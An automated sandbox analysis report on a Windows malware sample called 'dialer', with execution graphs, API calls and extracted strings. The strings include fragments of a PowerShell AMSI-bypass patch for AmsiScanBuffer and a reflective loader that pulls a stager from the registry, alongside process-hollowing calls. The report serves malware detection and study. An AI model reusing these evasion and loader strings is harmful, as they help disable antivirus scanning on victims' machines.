                                                                  • Snapshot File: hcaresult_0_2_7ff712420000_0Ty.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                  • Instruction ID: f38de9a0cc0fc67c9b85663b298365090772ce3e75d74cb40ddf3daf2572c0f6
                                                                  • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                  • Instruction Fuzzy Hash: 30B09234904A4984E2013B82E84126862606B08750F810020C80C02352CEBD58648B61

                                                                  Execution Graph

                                                                  Execution Coverage:75.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:38.5%
                                                                  Total number of Nodes:96
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 190 140001970 193 140001984 FindResourceExA 190->193 194 140001979 ExitProcess 193->194 195 1400019ae SizeofResource 193->195 195->194 196 1400019c3 LoadResource 195->196 196->194 197 1400019d7 LockResource RegOpenKeyExW 196->197 197->194 198 140001a0e RegSetValueExW 197->198 198->194 199 140001a34 198->199 209 140001a7c GetProcessHeap HeapAlloc StrCpyW 199->209 203 140001a48 204 1400017ec 9 API calls 203->204 205 140001a57 204->205 252 14000117c 7 API calls 205->252 207 140001a62 207->194 262 140001614 SysAllocString SysAllocString CoInitializeEx 207->262 272 14000114c GetModuleHandleA 209->272 212 140001b05 StrCatW StrCatW 275 140001c9c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 212->275 213 140001ad5 StrCatW StrCatW StrCatW 213->212 218 140001c0c 6 API calls 219 140001b4b 218->219 220 140001c0c 6 API calls 219->220 221 140001b5a 220->221 222 140001c0c 6 API calls 221->222 223 140001b69 222->223 224 140001c0c 6 API calls 223->224 225 140001b78 224->225 226 140001c0c 6 API calls 225->226 227 140001b87 226->227 228 140001c0c 6 API calls 227->228 229 140001b96 228->229 230 140001c0c 6 API calls 229->230 231 140001ba5 230->231 232 140001c0c 6 API calls 231->232 233 140001bb4 232->233 234 140001c0c 6 API calls 233->234 235 140001bc3 234->235 236 140001c0c 6 API calls 235->236 237 140001bd2 236->237 238 140001c0c 6 API calls 237->238 239 140001be1 238->239 240 140001c0c 6 API calls 239->240 241 140001bf0 240->241 242 140001c0c 6 API calls 241->242 243 140001a39 242->243 244 1400017ec SysAllocString SysAllocString CoInitializeEx 243->244 245 140001948 SysFreeString SysFreeString 244->245 246 14000182d CoInitializeSecurity 244->246 245->203 247 140001875 CoCreateInstance 246->247 248 140001869 246->248 249 140001942 CoUninitialize 247->249 250 1400018a4 VariantInit 247->250 248->247 248->249 249->245 251 1400018fa 250->251 251->249 253 14000120e CoInitializeSecurity 252->253 254 
1400015c0 6 API calls 252->254 255 140001256 CoCreateInstance 253->255 256 14000124a 253->256 254->207 257 1400015ba CoUninitialize 255->257 258 140001287 VariantInit 255->258 256->255 256->257 257->254 260 1400012de 258->260 259 140001537 259->257 260->259 261 140001489 VariantInit VariantInit VariantInit 260->261 261->259 263 1400017c5 SysFreeString SysFreeString 262->263 264 140001655 CoInitializeSecurity 262->264 263->194 265 140001691 264->265 266 14000169d CoCreateInstance 264->266 265->266 267 1400017bf CoUninitialize 265->267 266->267 268 1400016cc VariantInit 266->268 267->263 269 140001722 268->269 270 14000175c VariantInit 269->270 271 14000178e 269->271 270->271 271->267 273 140001174 272->273 274 140001167 GetProcAddress 272->274 273->212 273->213 274->273 296 140001000 CryptAcquireContextW 275->296 278 140001b2d 289 140001c0c lstrlenW 278->289 279 140001d0d StrStrIW 280 140001f21 6 API calls 279->280 284 140001d2c 279->284 280->278 281 140001d2f StrStrIW StrNCatW StrCatW 282 140001edf StrCatW StrStrIW 281->282 281->284 282->281 283 140001f19 282->283 283->280 284->281 284->282 285 140001ebf StrCatW 284->285 286 140001e82 StrCatW StrNCatW 284->286 288 140001e5a StrCatW StrCatW 284->288 285->284 287 140001eae StrCatW 286->287 287->285 288->287 299 140001070 289->299 291 140001c45 292 140001c49 StrStrIW 291->292 293 140001b3c 291->293 292->293 294 140001c5a 292->294 293->218 295 140001c5d StrStrIW 294->295 295->293 295->295 297 140001039 CryptGenRandom CryptReleaseContext 296->297 298 14000105e 296->298 297->298 298->278 298->279 300 140001000 3 API calls 299->300 301 1400010ea 300->301 301->291 301->301

                                                                  Callgraph

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                                  • String ID: '+'$'+[Char]($)+'$0$gfff$gfff
                                                                  • API String ID: 3510167801-2888743547
                                                                  • Opcode ID: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                                  • Instruction ID: 860a95141ccdf47dad873dcb7fdad07428551a8c4d737b9ab5c8568f3082a9eb
                                                                  • Opcode Fuzzy Hash: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                                  • Instruction Fuzzy Hash: 6A715CB2710B5696EB16DF67FC187D927A6FB89BC8F448025EE0A47B65DE38C509C300

                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                  • String ID: dialersvc64
                                                                  • API String ID: 2407135876-3881820561
                                                                  • Opcode ID: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                                  • Instruction ID: d87eb2bd9d729e9729409dc9478b0812213582aedf91d7913a1da9f61deadf9a
                                                                  • Opcode Fuzzy Hash: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                                  • Instruction Fuzzy Hash: B6510576704A458AEB11CF7AE8843DD63B1FB88B98F444226EF4E47A29DF38C149C340

                                                                  APIs
                                                                  • FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                                  • SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                                  • LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                                  • LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                                  • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                                    • Part of subcall function 0000000140001A7C: GetProcessHeap.KERNEL32 ref: 0000000140001A85
                                                                    • Part of subcall function 0000000140001A7C: HeapAlloc.KERNEL32 ref: 0000000140001A96
                                                                    • Part of subcall function 0000000140001A7C: StrCpyW.SHLWAPI ref: 0000000140001AA9
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001ADF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AEF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AFF
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B0F
                                                                    • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B1F
                                                                    • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001802
                                                                    • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001812
                                                                    • Part of subcall function 00000001400017EC: CoInitializeEx.COMBASE ref: 000000014000181F
                                                                    • Part of subcall function 00000001400017EC: CoInitializeSecurity.COMBASE ref: 0000000140001856
                                                                    • Part of subcall function 00000001400017EC: CoCreateInstance.COMBASE ref: 0000000140001896
                                                                    • Part of subcall function 00000001400017EC: VariantInit.OLEAUT32 ref: 00000001400018A8
                                                                    • Part of subcall function 00000001400017EC: CoUninitialize.COMBASE ref: 0000000140001942
                                                                    • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 000000014000194B
                                                                    • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 0000000140001954
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011A7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011B7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011C7
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011D3
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011E3
                                                                    • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011F3
                                                                    • Part of subcall function 000000014000117C: CoInitializeEx.COMBASE ref: 0000000140001200
                                                                    • Part of subcall function 000000014000117C: CoInitializeSecurity.COMBASE ref: 0000000140001237
                                                                    • Part of subcall function 000000014000117C: CoCreateInstance.COMBASE ref: 0000000140001279
                                                                    • Part of subcall function 000000014000117C: VariantInit.OLEAUT32 ref: 000000014000128B
                                                                    • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000162A
                                                                    • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000163A
                                                                    • Part of subcall function 0000000140001614: CoInitializeEx.OLE32 ref: 0000000140001647
                                                                    • Part of subcall function 0000000140001614: CoInitializeSecurity.COMBASE ref: 000000014000167E
                                                                    • Part of subcall function 0000000140001614: CoCreateInstance.COMBASE ref: 00000001400016BE
                                                                    • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 00000001400016D0
                                                                    • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 0000000140001760
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$Initialize$InitResourceVariant$CreateInstanceSecurity$FreeHeap$FindLoadLockOpenProcessSizeofUninitializeValue
                                                                  • String ID: EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                                  • API String ID: 2204944113-1859800454
                                                                  • Opcode ID: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                                  • Instruction ID: 1bfe2c02107bc6537b2911a47a34f854c4b6e53c22e939ebebcbb702dcfd335c
                                                                  • Opcode Fuzzy Hash: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                                  • Instruction Fuzzy Hash: D5213BBA30570152EA26DF63B8143E963A1AB8DBD0F484125FB49477BAEF3CC604C600

                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                  • API String ID: 1815803762-291530887
                                                                  • Opcode ID: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                                  • Instruction ID: 74dd50a8ca20c1687fe1fd25669d783deb6ceb092ba3a030a89a64c3b25fe62d
                                                                  • Opcode Fuzzy Hash: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                                  • Instruction Fuzzy Hash: 28F01976700B4082E711CB67E88438AA7A2BBCCB80F498025DB5947729DEB4C956C740

                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AddressAllocHandleModuleProcProcess
                                                                  • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                  • API String ID: 3242894177-3709903795
                                                                  • Opcode ID: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                                  • Instruction ID: 14a767466f4e457cf388ac16d0af6f49bf344e7045f9ae0e12022511aa144a10
                                                                  • Opcode Fuzzy Hash: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                                  • Instruction Fuzzy Hash: 38416BF8284702A1FA1BEF17B8557D52365A78DBC5F846261BE0A473B69EBCC108C394

                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                                  • String ID: SYSTEM$dialersvc64$powershell
                                                                  • API String ID: 3960698109-174983134
                                                                  • Opcode ID: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                                  • Instruction ID: aee36af91c86c83140a7f8fc7c4422115872d8a4c3e6ef38ff6a7da2a4766896
                                                                  • Opcode Fuzzy Hash: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                                  • Instruction Fuzzy Hash: 2DD1DE76604B8586EB11CF6AE8843DE67B1FB88B99F508116EF4E47B68DF39C149C700

                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                  • String ID:
                                                                  • API String ID: 4184240511-0
                                                                  • Opcode ID: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                                  • Instruction ID: 67cbc857c72eec62a5b69ac69888ab56890e3342390bd1f27bc6256027a28dd6
                                                                  • Opcode Fuzzy Hash: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                                  • Instruction Fuzzy Hash: 5E413972704A458AEB11CF7AE8543DD73B1FB89B99F449226AF4A47A69DF38C149C300

                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID:
                                                                  • API String ID: 1659193697-0
                                                                  • Opcode ID: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                                  • Instruction ID: 09bf7b72404f13f14ced639d6c0c6f67ee10a0461fa6ddbcf4aeef183f1f47ff
                                                                  • Opcode Fuzzy Hash: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                                  • Instruction Fuzzy Hash: 9B0116B6344B8185EA66CF13A804BA963AAF78CFC0F598131AE4D83765DF38D946C740

                                                                  APIs
                                                                    • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                                    • Part of subcall function 0000000140001984: SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                                    • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                                    • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                                    • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                                    • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                                  • ExitProcess.KERNEL32 ref: 000000014000197B
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                                  • String ID:
                                                                  • API String ID: 3836967525-0
                                                                  • Opcode ID: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                                  • Instruction ID: 591ae2b672e41714171671f8838f177bfce947d6885aae7fa81f753db4d17b5a
                                                                  • Opcode Fuzzy Hash: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                                  • Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00

                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.1719381504.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000018.00000002.1719365235.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000018.00000002.1719433628.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: RtlGetVersion$ntdll.dll
                                                                  • API String ID: 1646373207-1489217083
                                                                  • Opcode ID: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                                  • Instruction ID: 59613ef8418529ec4bc26aae3d36b02baf67a4f8cd1ada14fad478f70e9913c3
                                                                  • Opcode Fuzzy Hash: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                                  • Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700

                                                                  Execution Graph

                                                                  Execution Coverage:6.3%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:38.1%
                                                                  Total number of Nodes:126
                                                                  Total number of Limit Nodes:2

Control-flow Graph: function at 7ffd9b8af63e (interactive graph widget not rendered; calls 7ffd9b8ae078, 7ffd9b8adec0, 7ffd9b8ae088, 7ffd9b8ae098, 7ffd9b8ae0a8, 7ffd9b8ae0b8, 7ffd9b8ae0c8, 7ffd9b8ae0d8, 7ffd9b8ae0e8, 7ffd9b8ae0f8, 7ffd9b8ae108, 7ffd9b8ae118, 7ffd9b8adeb8)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID:
• String ID: ($@
• API String ID: 0-1311469180
• Opcode ID: 240e18dd340719dd5743e3a055f3b553731c62f54a0231ad009cfdce4d21ce0e
• Instruction ID: 0957493236c6543fac53c74e23f2f36634a0a8e3760e971f3fa666138ff12b92
• Opcode Fuzzy Hash: 240e18dd340719dd5743e3a055f3b553731c62f54a0231ad009cfdce4d21ce0e
• Instruction Fuzzy Hash: BD32E530F19A4D4BEB68EBA888667FD73E1FF98300F51017AD44ED36D6DE2869418781

Control-flow Graph: function at 7ffd9b8af659 (interactive graph widget not rendered; calls 7ffd9b8ae078, 7ffd9b8adec0, 7ffd9b8ae088, 7ffd9b8ae098, 7ffd9b8ae0a8, 7ffd9b8ae0b8, 7ffd9b8ae0c8, 7ffd9b8ae0d8, 7ffd9b8ae0e8, 7ffd9b8ae0f8, 7ffd9b8ae108, 7ffd9b8ae118, 7ffd9b8adeb8)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID:
• String ID: ($@
• API String ID: 0-1311469180
• Opcode ID: ced20436940b4a3cbc61d766e2563bd523ab058f388d7c5809258528da5d038d
• Instruction ID: 3bc4683d4aa383c45c6fc3347170dd098369b6290aad2d8e446b72a7b41136ed
• Opcode Fuzzy Hash: ced20436940b4a3cbc61d766e2563bd523ab058f388d7c5809258528da5d038d
• Instruction Fuzzy Hash: 5C02B130A0864D4BEB68EFA88861BFD77E2FF58300F11417ED44ED3696DE38A9418B51

Control-flow Graph: function at 7ffd9b8afde9 (interactive graph widget not rendered; calls 7ffd9b8ae078, 7ffd9b8adec0, 7ffd9b8ae088, 7ffd9b8ae098, 7ffd9b8ae0a8, 7ffd9b8ae0b8, 7ffd9b8ae0c8, 7ffd9b8ae0d8, 7ffd9b8ae0e8, 7ffd9b8ae0f8, 7ffd9b8ae108, 7ffd9b8ae118, 7ffd9b8adeb8)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID:
• String ID: ($@
• API String ID: 0-1311469180
• Opcode ID: 0c2911d09444e4eeb05f7e527314d4d8a9894db8dbd21f4b28a207f527ef36ef
• Instruction ID: 5d5d3882317e053f90ca744beca4d9ca6bcd05d947afb0ef2e92dd18dbcbad03
• Opcode Fuzzy Hash: 0c2911d09444e4eeb05f7e527314d4d8a9894db8dbd21f4b28a207f527ef36ef
• Instruction Fuzzy Hash: B3029F30B0864D4BEB68EFA8C4A1BBD73E2FF98304F114179D44ED3696DE38A9418B51

Control-flow Graph: function at 7ffd9b8adf98 (interactive graph widget not rendered; API call shown: NtUnmapViewOfSection)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05b9a10355d0b3120ede95df161664e8189e4c1c8f98931b03c817d2177be05a
• Instruction ID: 8cf4d529516f007a0e07a1c688a4c80e8ae75ae2c50166628a1c7c8374c51d50
• Opcode Fuzzy Hash: 05b9a10355d0b3120ede95df161664e8189e4c1c8f98931b03c817d2177be05a
• Instruction Fuzzy Hash: 2E516B72A0E7DC4FDB16DBA858696E63FA0EF97210F0941FFC089C70A3E9545906C391

Control-flow Graph: function at 7ffd9b8b0c5d (interactive graph widget not rendered; API call shown: NtWriteVirtualMemory)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID: MemoryVirtualWrite
• String ID:
• API String ID: 3527976591-0
• Opcode ID: 1cd7b217857121db9bf73fdfdcd0e56c0410441445e9e9caa59a1e29196587ce
• Instruction ID: e616fbb69b8d673e337add91f0c875ac2fbad7786dfc70a5261058a0b192fc72
• Opcode Fuzzy Hash: 1cd7b217857121db9bf73fdfdcd0e56c0410441445e9e9caa59a1e29196587ce
• Instruction Fuzzy Hash: 4D31D33191CB5C8FDB18DF58D885AE9BBE0FF5A321F04426ED049D3692CB70A806CB81

Control-flow Graph: function at 7ffd9b8ae078 (interactive graph widget not rendered; API call shown: NtUnmapViewOfSection)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
• Opcode ID: 5b7631f425297cdf70ab2d07af0f796cd12b59449e4ff3fa7d46f6eab53e8ee8
• Instruction ID: 9eb818b10a3630f4528555fc0a4000c105797494c8ee7870a23b4c8c1a5ee69e
• Opcode Fuzzy Hash: 5b7631f425297cdf70ab2d07af0f796cd12b59449e4ff3fa7d46f6eab53e8ee8
• Instruction Fuzzy Hash: 68314672A0DB4C8FEB58CB98D8497A97BE0FBA9320F04416BD049C71A2E670A945C751

Control-flow Graph: function at 7ffd9b8b0a3e (interactive graph widget not rendered; API call shown: NtUnmapViewOfSection)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
